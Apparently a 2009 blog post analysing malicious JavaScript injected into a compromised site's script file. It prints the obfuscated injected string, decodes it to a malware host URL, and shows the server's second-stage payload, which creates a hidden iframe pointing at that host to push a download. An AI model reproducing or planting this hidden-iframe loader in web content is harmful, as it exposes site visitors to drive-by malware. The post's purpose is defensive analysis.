After founding the malicious site. I have unescaped the malicious JS content. Somehow malicious javascript was added to the end of js file.
Here is the replace function
'h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&)t!#&-))c#^!!o@&)m@)$-####b$$r)#.$t&&a@b&(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&&$e^r$^&o#t!&)i)&)c#&a$&&-@#)c$#!o)(^@#m)$&(.#i$#n&(n&&e&w!$)t$&e@r@!(r#@&((a#(.#!&r&#u&$#:(@&8)^!0&8$@)0!/($!g#)$(o&#@o^!g!)l$&^e^@.#!c#)(n(/^$g!(!o!^&o@#&@g)l^#(#e&^@.$^$&c!^)n(/!$(g!o^)&!o@g&(!l$(!!e&@&$.#&c(($o&)m&#)/$(^h^&))a^!o!1&(2^##3#.&&#(c#!&o&m(#/)^&i@@s@@&)t)^^)o((!c$k&(@!p##h#)@o(t)^#o^&.^&!c)#o^!m@$/$@#'.replace(/&\(#\!\)\^\$@/ig, '')
I have replaced all & , ( , # ,! ,^ $ , @ with escape and here is the link.
#http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/google.cn/google.cn/google.com/hao123.com/istockphoto.com#
I tried to GET the request ( normally, the javascript tried the URL in iframe ) and below is the response from the server .
Most of the malicious Server Tag includes " nginx " :) , you may block this Server header on your internal proxy.
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 21 Dec 2009 21:09:55 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 374
Luq39s = 'o##r!!k)u!@t)#-$@$)c^$o@#m(@$-^b()r&^#.!$(@t@!&(a!#b)n)!a)^)k@!#.@&#^i($r&.@^@#l^)i@t$!e$^r#&o^@#t!#@i#)!$c#)&a$-^c@^o#@(@m@^^.$(#^i)@^n$@&n^$)e$(w$!t#e#@r^#(#r#)@a@$.#(r@&u#)@'.replace(/\!&\^\(#\)\$@/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Luq39s+':8080/index.php?js';
document.body.appendChild(f);
I have decoded Luq39s with same way and the current malicious URL is below
#http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/index.php#
You download an com file, called istockphoto.com from the side.
No comments:
Post a Comment